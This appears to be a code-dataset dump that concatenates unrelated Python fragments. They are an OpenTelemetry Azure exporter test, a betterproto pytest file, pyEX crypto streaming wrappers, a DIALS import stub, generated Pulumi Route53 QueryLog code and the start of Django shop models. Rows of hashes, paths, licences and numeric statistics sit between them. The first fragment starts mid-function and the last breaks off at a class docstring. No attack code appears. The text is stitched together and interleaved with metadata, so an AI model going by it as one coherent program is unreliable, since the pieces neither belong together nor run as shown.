context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.method": "GET",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
},
events=None,
links=[],
kind=SpanKind.CLIENT,
)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
span.start(start_time=start_time)
span.end(end_time=end_time)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.data.base_data.result_code, "0")
self.assertTrue(envelope.data.base_data.success)
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.method": "GET",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
},
events=None,
links=[],
kind=SpanKind.SERVER,
)
span.start(start_time=start_time)
span.end(end_time=end_time)
span.status = Status(canonical_code=StatusCanonicalCode.UNKNOWN)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.data.base_data.response_code, "2")
self.assertFalse(envelope.data.base_data.success)
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.method": "GET",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
},
events=None,
links=[],
kind=SpanKind.CLIENT,
)
span.start(start_time=start_time)
span.end(end_time=end_time)
span.status = Status(canonical_code=StatusCanonicalCode.UNKNOWN)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.data.base_data.result_code, "2")
self.assertFalse(envelope.data.base_data.success)
# Server route attribute
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "HTTP",
"http.method": "GET",
"http.route": "/wiki/Rabbit",
"http.path": "/wiki/Rabbitz",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 400,
},
events=None,
links=[],
kind=SpanKind.SERVER,
)
span.start(start_time=start_time)
span.end(end_time=end_time)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
envelope = exporter._span_to_envelope(span)
self.assertEqual(
envelope.data.base_data.properties["request.name"],
"GET /wiki/Rabbit",
)
self.assertEqual(
envelope.data.base_data.properties["request.url"],
"https://www.wikipedia.org/wiki/Rabbit",
)
# Server method attribute missing
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "HTTP",
"http.path": "/wiki/Rabbitz",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 400,
},
events=None,
links=[],
kind=SpanKind.SERVER,
)
span.start(start_time=start_time)
span.end(end_time=end_time)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
envelope = exporter._span_to_envelope(span)
self.assertIsNone(envelope.data.base_data.name)
# Server route attribute missing
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "HTTP",
"http.method": "GET",
"http.path": "/wiki/Rabbitz",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 400,
},
events=None,
links=[],
kind=SpanKind.SERVER,
)
span.start(start_time=start_time)
span.end(end_time=end_time)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.data.base_data.name, "GET")
self.assertEqual(
envelope.data.base_data.properties["request.name"],
"GET /wiki/Rabbitz",
)
self.assertEqual(
envelope.data.base_data.properties["request.url"],
"https://www.wikipedia.org/wiki/Rabbit",
)
# Server route and path attribute missing
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "HTTP",
"http.method": "GET",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 400,
},
events=None,
links=[],
kind=SpanKind.SERVER,
)
span.start(start_time=start_time)
span.end(end_time=end_time)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
envelope = exporter._span_to_envelope(span)
self.assertIsNone(
envelope.data.base_data.properties.get("request.name")
)
self.assertEqual(
envelope.data.base_data.properties["request.url"],
"https://www.wikipedia.org/wiki/Rabbit",
)
# Server http.url missing
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "HTTP",
"http.method": "GET",
"http.route": "/wiki/Rabbit",
"http.path": "/wiki/Rabbitz",
"http.status_code": 400,
},
events=None,
links=[],
kind=SpanKind.SERVER,
)
span.start(start_time=start_time)
span.end(end_time=end_time)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
envelope = exporter._span_to_envelope(span)
self.assertIsNone(envelope.data.base_data.url)
self.assertIsNone(
envelope.data.base_data.properties.get("request.url")
)
| 36.646266 | 79 | 0.573782 | 3,291 | 35,327 | 6.001215 | 0.076876 | 0.086582 | 0.110633 | 0.066835 | 0.858684 | 0.839038 | 0.83362 | 0.813063 | 0.806633 | 0.78638 | 0 | 0.098237 | 0.320831 | 35,327 | 963 | 80 | 36.68432 | 0.72492 | 0.021145 | 0 | 0.754484 | 0 | 0 | 0.136741 | 0.048572 | 0 | 0 | 0 | 0 | 0.143498 | 1 | 0.016816 | false | 0 | 0.013453 | 0 | 0.032511 | 0.001121 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fe21c435b281f82c8c723a7f7f3f6435ee624495 | 1,337 | py | Python | tests/inputs/oneof_enum/test_oneof_enum.py | theunkn0wn1/python-betterproto | cbd34370803a537743f6cdcadb9e5893781b137d | [
"MIT"
] | 1 | 2021-11-05T08:49:33.000Z | 2021-11-05T08:49:33.000Z | tests/inputs/oneof_enum/test_oneof_enum.py | theunkn0wn1/python-betterproto | cbd34370803a537743f6cdcadb9e5893781b137d | [
"MIT"
] | null | null | null | tests/inputs/oneof_enum/test_oneof_enum.py | theunkn0wn1/python-betterproto | cbd34370803a537743f6cdcadb9e5893781b137d | [
"MIT"
] | null | null | null | import pytest
import betterproto
from tests.output_betterproto.oneof_enum import (
Move,
Signal,
Test,
)
from tests.util import get_test_case_json_data
@pytest.mark.xfail
def test_which_one_of_returns_enum_with_default_value():
    """Oneof group resolves to the first enum field when it holds its default value."""
    json_payload = get_test_case_json_data("oneof_enum", "oneof_enum-enum-0.json")
    message = Test()
    message.from_json(json_payload)

    assert message.move is None
    assert message.signal == Signal.PASS
    field_name, field_value = betterproto.which_one_of(message, "action")
    assert (field_name, field_value) == ("signal", Signal.PASS)
@pytest.mark.xfail
def test_which_one_of_returns_enum_with_non_default_value():
    """
    returns first field when it is enum and set with non default value

    The ``oneof_enum-enum-1.json`` fixture sets ``signal`` to a non-default
    enum value, so both the field itself and ``which_one_of`` must report it.
    """
    message = Test()
    message.from_json(get_test_case_json_data("oneof_enum", "oneof_enum-enum-1.json"))
    assert message.move is None
    # Fixed: previously asserted Signal.PASS here, contradicting the
    # which_one_of expectation below and the test's own "non default
    # value" premise.
    assert message.signal == Signal.RESIGN
    assert betterproto.which_one_of(message, "action") == ("signal", Signal.RESIGN)
@pytest.mark.xfail
def test_which_one_of_returns_second_field_when_set():
    """Oneof group resolves to the ``move`` field when the fixture populates it."""
    message = Test()
    message.from_json(get_test_case_json_data("oneof_enum"))

    expected_move = Move(x=2, y=3)
    assert message.move == expected_move
    assert message.signal == 0
    assert betterproto.which_one_of(message, "action") == ("move", expected_move)
| 31.093023 | 86 | 0.729245 | 199 | 1,337 | 4.613065 | 0.236181 | 0.058824 | 0.065359 | 0.065359 | 0.812636 | 0.791939 | 0.765795 | 0.722222 | 0.722222 | 0.679739 | 0 | 0.006239 | 0.160808 | 1,337 | 42 | 87 | 31.833333 | 0.811943 | 0.096485 | 0 | 0.344828 | 0 | 0 | 0.091759 | 0.037383 | 0 | 0 | 0 | 0 | 0.310345 | 1 | 0.103448 | false | 0.103448 | 0.137931 | 0 | 0.241379 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
fe45f46170951254b2f2194660ee9f255c82f1f6 | 3,477 | py | Python | pyEX/marketdata/cryptocurrency.py | andrescevp/pyEX | 4c8daa411b01133a292d341a78f6e1b80cc2be99 | [
"Apache-2.0"
] | null | null | null | pyEX/marketdata/cryptocurrency.py | andrescevp/pyEX | 4c8daa411b01133a292d341a78f6e1b80cc2be99 | [
"Apache-2.0"
] | null | null | null | pyEX/marketdata/cryptocurrency.py | andrescevp/pyEX | 4c8daa411b01133a292d341a78f6e1b80cc2be99 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from enum import Enum
from .sse import _runSSE, _runSSEAsync
class CryptoSSE(Enum):
    """SSE channel names for IEX Cloud cryptocurrency streams."""

    BOOK = "cryptoBook"
    EVENTS = "cryptoEvents"
    QUOTES = "cryptoQuotes"

    @staticmethod
    def options():
        """Return every channel name as a plain list of strings."""
        return [member.value for member in CryptoSSE]
def cryptoBookSSE(symbols=None, on_data=None, token="", version=""):
    """Stream the current book for the given cryptocurrencies over SSE.

    A full representation of the book is pushed to ``on_data`` as often as
    the book changes.

    https://iexcloud.io/docs/api/#cryptocurrency-book

    Args:
        symbols (str): Tickers to request
        on_data (function): Callback on data
        token (str): Access token
        version (str): API version
    """
    channel = "cryptoBook"
    return _runSSE(channel, symbols, on_data, token, version)
async def cryptoBookSSEAsync(symbols=None, token="", version=""):
    """Asynchronously stream the current book for the given cryptocurrencies.

    Yields a full representation of the book as often as the book changes.

    https://iexcloud.io/docs/api/#cryptocurrency-book

    Args:
        symbols (str): Tickers to request
        token (str): Access token
        version (str): API version
    """
    async for message in _runSSEAsync("cryptoBook", symbols, token, version):
        yield message
def cryptoEventsSSE(symbols=None, on_data=None, token="", version=""):
    """Stream cryptocurrency order events (e.g. new and canceled orders) over SSE.

    https://iexcloud.io/docs/api/#cryptocurrency-events

    Args:
        symbols (str): Tickers to request
        on_data (function): Callback on data
        token (str): Access token
        version (str): API version
    """
    channel = "cryptoEvents"
    return _runSSE(channel, symbols, on_data, token, version)
async def cryptoEventsSSEAsync(symbols=None, token="", version=""):
    """Asynchronously stream cryptocurrency order events (e.g. new/canceled orders).

    https://iexcloud.io/docs/api/#cryptocurrency-events

    Args:
        symbols (str): Tickers to request
        token (str): Access token
        version (str): API version
    """
    async for event in _runSSEAsync("cryptoEvents", symbols, token, version):
        yield event
def cryptoQuotesSSE(symbols=None, on_data=None, token="", version=""):
    """Stream quotes for the given cryptocurrencies over SSE.

    https://iexcloud.io/docs/api/#cryptocurrency-quote

    Args:
        symbols (str): Tickers to request
        on_data (function): Callback on data
        token (str): Access token
        version (str): API version
    """
    channel = "cryptoQuotes"
    return _runSSE(channel, symbols, on_data, token, version)
async def cryptoQuotesSSEAsync(symbols=None, token="", version=""):
    """Asynchronously stream quotes for the given cryptocurrencies.

    https://iexcloud.io/docs/api/#cryptocurrency-quote

    Args:
        symbols (str): Tickers to request
        token (str): Access token
        version (str): API version
    """
    async for quote in _runSSEAsync("cryptoQuotes", symbols, token, version):
        yield quote
| 34.425743 | 313 | 0.685649 | 445 | 3,477 | 5.319101 | 0.206742 | 0.091255 | 0.040558 | 0.050697 | 0.850021 | 0.838192 | 0.809041 | 0.761301 | 0.761301 | 0.754119 | 0 | 0.000368 | 0.217429 | 3,477 | 100 | 314 | 34.77 | 0.869533 | 0.319241 | 0 | 0.125 | 0 | 0 | 0.084577 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.083333 | 0.041667 | 0.583333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
22da48482112c7628a5b620605be4e06b37f2e6a | 208 | py | Python | modules/dials/algorithms/polygon/spatial_interpolation.py | jorgediazjr/dials-dev20191018 | 77d66c719b5746f37af51ad593e2941ed6fbba17 | [
"BSD-3-Clause"
] | null | null | null | modules/dials/algorithms/polygon/spatial_interpolation.py | jorgediazjr/dials-dev20191018 | 77d66c719b5746f37af51ad593e2941ed6fbba17 | [
"BSD-3-Clause"
] | null | null | null | modules/dials/algorithms/polygon/spatial_interpolation.py | jorgediazjr/dials-dev20191018 | 77d66c719b5746f37af51ad593e2941ed6fbba17 | [
"BSD-3-Clause"
] | 1 | 2020-02-04T15:39:06.000Z | 2020-02-04T15:39:06.000Z | from __future__ import absolute_import, division, print_function
from dials_algorithms_polygon_ext import *
from dials_algorithms_polygon_spatial_interpolation_ext import *
from scitbx.array_family import *
| 34.666667 | 64 | 0.879808 | 27 | 208 | 6.222222 | 0.592593 | 0.107143 | 0.22619 | 0.309524 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.091346 | 208 | 5 | 65 | 41.6 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.25 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a3af81f9091c3cbfe5e9a41d5f3dfff1b55c8277 | 14,120 | py | Python | sdk/python/pulumi_aws/route53/query_log.py | chivandikwa/pulumi-aws | 19c08bf9dcb90544450ffa4eec7bf6751058fde2 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2021-11-10T16:33:40.000Z | 2021-11-10T16:33:40.000Z | sdk/python/pulumi_aws/route53/query_log.py | chivandikwa/pulumi-aws | 19c08bf9dcb90544450ffa4eec7bf6751058fde2 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/route53/query_log.py | chivandikwa/pulumi-aws | 19c08bf9dcb90544450ffa4eec7bf6751058fde2 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['QueryLogArgs', 'QueryLog']
@pulumi.input_type
class QueryLogArgs:
    """Constructor arguments for a ``QueryLog`` resource.

    NOTE: this class is generated by the Pulumi Terraform bridge; the
    ``@pulumi.input_type`` decorator introspects this exact
    property/setter layout, so its structure must stay as generated.
    """

    def __init__(__self__, *,
                 cloudwatch_log_group_arn: pulumi.Input[str],
                 zone_id: pulumi.Input[str]):
        """
        The set of arguments for constructing a QueryLog resource.
        :param pulumi.Input[str] cloudwatch_log_group_arn: CloudWatch log group ARN to send query logs.
        :param pulumi.Input[str] zone_id: Route53 hosted zone ID to enable query logs.
        """
        # Values are stored through pulumi.set so the SDK can track
        # inputs/outputs and resolve them at deployment time.
        pulumi.set(__self__, "cloudwatch_log_group_arn", cloudwatch_log_group_arn)
        pulumi.set(__self__, "zone_id", zone_id)

    @property
    @pulumi.getter(name="cloudwatchLogGroupArn")
    def cloudwatch_log_group_arn(self) -> pulumi.Input[str]:
        """
        CloudWatch log group ARN to send query logs.
        """
        return pulumi.get(self, "cloudwatch_log_group_arn")

    @cloudwatch_log_group_arn.setter
    def cloudwatch_log_group_arn(self, value: pulumi.Input[str]):
        pulumi.set(self, "cloudwatch_log_group_arn", value)

    @property
    @pulumi.getter(name="zoneId")
    def zone_id(self) -> pulumi.Input[str]:
        """
        Route53 hosted zone ID to enable query logs.
        """
        return pulumi.get(self, "zone_id")

    @zone_id.setter
    def zone_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "zone_id", value)
@pulumi.input_type
class _QueryLogState:
    """Internal state container used when looking up or importing an
    existing ``QueryLog`` resource (see ``QueryLog.get``).

    NOTE: generated by the Pulumi Terraform bridge; the
    ``@pulumi.input_type`` decorator introspects this exact layout.
    """

    def __init__(__self__, *,
                 arn: Optional[pulumi.Input[str]] = None,
                 cloudwatch_log_group_arn: Optional[pulumi.Input[str]] = None,
                 zone_id: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering QueryLog resources.
        :param pulumi.Input[str] arn: The Amazon Resource Name (ARN) of the Query Logging Config.
        :param pulumi.Input[str] cloudwatch_log_group_arn: CloudWatch log group ARN to send query logs.
        :param pulumi.Input[str] zone_id: Route53 hosted zone ID to enable query logs.
        """
        # All fields are optional filters: only set the ones actually provided.
        if arn is not None:
            pulumi.set(__self__, "arn", arn)
        if cloudwatch_log_group_arn is not None:
            pulumi.set(__self__, "cloudwatch_log_group_arn", cloudwatch_log_group_arn)
        if zone_id is not None:
            pulumi.set(__self__, "zone_id", zone_id)

    @property
    @pulumi.getter
    def arn(self) -> Optional[pulumi.Input[str]]:
        """
        The Amazon Resource Name (ARN) of the Query Logging Config.
        """
        return pulumi.get(self, "arn")

    @arn.setter
    def arn(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "arn", value)

    @property
    @pulumi.getter(name="cloudwatchLogGroupArn")
    def cloudwatch_log_group_arn(self) -> Optional[pulumi.Input[str]]:
        """
        CloudWatch log group ARN to send query logs.
        """
        return pulumi.get(self, "cloudwatch_log_group_arn")

    @cloudwatch_log_group_arn.setter
    def cloudwatch_log_group_arn(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cloudwatch_log_group_arn", value)

    @property
    @pulumi.getter(name="zoneId")
    def zone_id(self) -> Optional[pulumi.Input[str]]:
        """
        Route53 hosted zone ID to enable query logs.
        """
        return pulumi.get(self, "zone_id")

    @zone_id.setter
    def zone_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "zone_id", value)
class QueryLog(pulumi.CustomResource):
    # NOTE: generated by the Pulumi Terraform bridge (tfgen); structure and
    # signatures must stay as generated for the bridge to work.

    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 cloudwatch_log_group_arn: Optional[pulumi.Input[str]] = None,
                 zone_id: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Provides a Route53 query logging configuration resource.

        > **NOTE:** There are restrictions on the configuration of query logging. Notably,
        the CloudWatch log group must be in the `us-east-1` region,
        a permissive CloudWatch log resource policy must be in place, and
        the Route53 hosted zone must be public.
        See [Configuring Logging for DNS Queries](https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/query-logs.html?console_help=true#query-logs-configuring) for additional details.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_aws as aws
        import pulumi_pulumi as pulumi

        # Example CloudWatch log group in us-east-1
        us_east_1 = pulumi.providers.Aws("us-east-1", region="us-east-1")
        aws_route53_example_com = aws.cloudwatch.LogGroup("awsRoute53ExampleCom", retention_in_days=30,
        opts=pulumi.ResourceOptions(provider=aws["us-east-1"]))
        # Example CloudWatch log resource policy to allow Route53 to write logs
        # to any log group under /aws/route53/*
        route53_query_logging_policy_policy_document = aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs(
            actions=[
                "logs:CreateLogStream",
                "logs:PutLogEvents",
            ],
            resources=["arn:aws:logs:*:*:log-group:/aws/route53/*"],
            principals=[aws.iam.GetPolicyDocumentStatementPrincipalArgs(
                identifiers=["route53.amazonaws.com"],
                type="Service",
            )],
        )])
        route53_query_logging_policy_log_resource_policy = aws.cloudwatch.LogResourcePolicy("route53-query-logging-policyLogResourcePolicy",
            policy_document=route53_query_logging_policy_policy_document.json,
            policy_name="route53-query-logging-policy",
            opts=pulumi.ResourceOptions(provider=aws["us-east-1"]))
        # Example Route53 zone with query logging
        example_com_zone = aws.route53.Zone("exampleComZone")
        example_com_query_log = aws.route53.QueryLog("exampleComQueryLog",
            cloudwatch_log_group_arn=aws_route53_example_com.arn,
            zone_id=example_com_zone.zone_id,
            opts=pulumi.ResourceOptions(depends_on=[route53_query_logging_policy_log_resource_policy]))
        ```

        ## Import

        Route53 query logging configurations can be imported using their ID, e.g.,

        ```sh
         $ pulumi import aws:route53/queryLog:QueryLog example_com xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] cloudwatch_log_group_arn: CloudWatch log group ARN to send query logs.
        :param pulumi.Input[str] zone_id: Route53 hosted zone ID to enable query logs.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: QueryLogArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Provides a Route53 query logging configuration resource.

        > **NOTE:** There are restrictions on the configuration of query logging. Notably,
        the CloudWatch log group must be in the `us-east-1` region,
        a permissive CloudWatch log resource policy must be in place, and
        the Route53 hosted zone must be public.
        See [Configuring Logging for DNS Queries](https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/query-logs.html?console_help=true#query-logs-configuring) for additional details.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_aws as aws
        import pulumi_pulumi as pulumi

        # Example CloudWatch log group in us-east-1
        us_east_1 = pulumi.providers.Aws("us-east-1", region="us-east-1")
        aws_route53_example_com = aws.cloudwatch.LogGroup("awsRoute53ExampleCom", retention_in_days=30,
        opts=pulumi.ResourceOptions(provider=aws["us-east-1"]))
        # Example CloudWatch log resource policy to allow Route53 to write logs
        # to any log group under /aws/route53/*
        route53_query_logging_policy_policy_document = aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs(
            actions=[
                "logs:CreateLogStream",
                "logs:PutLogEvents",
            ],
            resources=["arn:aws:logs:*:*:log-group:/aws/route53/*"],
            principals=[aws.iam.GetPolicyDocumentStatementPrincipalArgs(
                identifiers=["route53.amazonaws.com"],
                type="Service",
            )],
        )])
        route53_query_logging_policy_log_resource_policy = aws.cloudwatch.LogResourcePolicy("route53-query-logging-policyLogResourcePolicy",
            policy_document=route53_query_logging_policy_policy_document.json,
            policy_name="route53-query-logging-policy",
            opts=pulumi.ResourceOptions(provider=aws["us-east-1"]))
        # Example Route53 zone with query logging
        example_com_zone = aws.route53.Zone("exampleComZone")
        example_com_query_log = aws.route53.QueryLog("exampleComQueryLog",
            cloudwatch_log_group_arn=aws_route53_example_com.arn,
            zone_id=example_com_zone.zone_id,
            opts=pulumi.ResourceOptions(depends_on=[route53_query_logging_policy_log_resource_policy]))
        ```

        ## Import

        Route53 query logging configurations can be imported using their ID, e.g.,

        ```sh
         $ pulumi import aws:route53/queryLog:QueryLog example_com xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
        ```

        :param str resource_name: The name of the resource.
        :param QueryLogArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        """Dispatch between the two overloads above (args-object vs keyword form)."""
        resource_args, opts = _utilities.get_resource_args_opts(QueryLogArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            # Called with a QueryLogArgs instance: unpack it into keywords.
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            # Called with plain keyword arguments: pass them straight through.
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 cloudwatch_log_group_arn: Optional[pulumi.Input[str]] = None,
                 zone_id: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        # Shared constructor body: validates options, builds the property
        # bag, then registers the resource with the Pulumi engine.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource (as opposed to looking one up by id).
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = QueryLogArgs.__new__(QueryLogArgs)

            # Both inputs are required unless the resource is identified by URN.
            if cloudwatch_log_group_arn is None and not opts.urn:
                raise TypeError("Missing required property 'cloudwatch_log_group_arn'")
            __props__.__dict__["cloudwatch_log_group_arn"] = cloudwatch_log_group_arn
            if zone_id is None and not opts.urn:
                raise TypeError("Missing required property 'zone_id'")
            __props__.__dict__["zone_id"] = zone_id
            # Output-only property; populated by the provider after creation.
            __props__.__dict__["arn"] = None
        super(QueryLog, __self__).__init__(
            'aws:route53/queryLog:QueryLog',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            arn: Optional[pulumi.Input[str]] = None,
            cloudwatch_log_group_arn: Optional[pulumi.Input[str]] = None,
            zone_id: Optional[pulumi.Input[str]] = None) -> 'QueryLog':
        """
        Get an existing QueryLog resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] arn: The Amazon Resource Name (ARN) of the Query Logging Config.
        :param pulumi.Input[str] cloudwatch_log_group_arn: CloudWatch log group ARN to send query logs.
        :param pulumi.Input[str] zone_id: Route53 hosted zone ID to enable query logs.
        """
        # Force opts.id to the requested id so the engine performs a lookup
        # instead of a create.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _QueryLogState.__new__(_QueryLogState)

        __props__.__dict__["arn"] = arn
        __props__.__dict__["cloudwatch_log_group_arn"] = cloudwatch_log_group_arn
        __props__.__dict__["zone_id"] = zone_id
        return QueryLog(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter
    def arn(self) -> pulumi.Output[str]:
        """
        The Amazon Resource Name (ARN) of the Query Logging Config.
        """
        return pulumi.get(self, "arn")

    @property
    @pulumi.getter(name="cloudwatchLogGroupArn")
    def cloudwatch_log_group_arn(self) -> pulumi.Output[str]:
        """
        CloudWatch log group ARN to send query logs.
        """
        return pulumi.get(self, "cloudwatch_log_group_arn")

    @property
    @pulumi.getter(name="zoneId")
    def zone_id(self) -> pulumi.Output[str]:
        """
        Route53 hosted zone ID to enable query logs.
        """
        return pulumi.get(self, "zone_id")
| 43.446154 | 189 | 0.655807 | 1,682 | 14,120 | 5.239596 | 0.12604 | 0.07228 | 0.09191 | 0.097697 | 0.821854 | 0.798026 | 0.772495 | 0.759333 | 0.753546 | 0.744015 | 0 | 0.01123 | 0.249504 | 14,120 | 324 | 190 | 43.580247 | 0.820421 | 0.476133 | 0 | 0.492537 | 1 | 0 | 0.108571 | 0.053406 | 0 | 0 | 0 | 0 | 0 | 1 | 0.149254 | false | 0.007463 | 0.037313 | 0 | 0.276119 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a3d2a049d627d78cec60f3f575e2f7ec8fbb5173 | 10,291 | py | Python | data/models.py | CodeMonk263/Live-Mart-Backend | 39f6e6b9dcb686a8b02313b289456f30e4b99f1c | [
"MIT"
] | null | null | null | data/models.py | CodeMonk263/Live-Mart-Backend | 39f6e6b9dcb686a8b02313b289456f30e4b99f1c | [
"MIT"
] | null | null | null | data/models.py | CodeMonk263/Live-Mart-Backend | 39f6e6b9dcb686a8b02313b289456f30e4b99f1c | [
"MIT"
] | null | null | null | from django.db import models
# Create your models here
from django.db import models
from django.conf import settings
from accounts.models import User
class Shop(models.Model):
    """A retailer's shop: owner, location, and attached delivery persons."""

    id = models.IntegerField(primary_key=True, default=1)
    username = models.ForeignKey(User, related_name="owner_name", on_delete=models.CASCADE, null=True, blank=True)
    name = models.CharField(max_length=50, null=True, blank=True)
    # Geographic coordinates of the shop.
    shop_lat = models.FloatField(default=0.0)
    shop_long = models.FloatField(default=0.0)
    address = models.TextField(max_length=300, null=True, blank=True)
    # Delivery persons attached to this shop.
    # Fixed: ``null=True`` has no effect on ManyToManyField (Django warning
    # fields.W340) and was removed; behavior is unchanged.
    delIds = models.ManyToManyField(User, related_name="delivery_persons", blank=True)

    def __str__(self):
        return str(self.name)
class Categories(models.Model):
    """A product category with an optional display image (stored as text/URL)."""

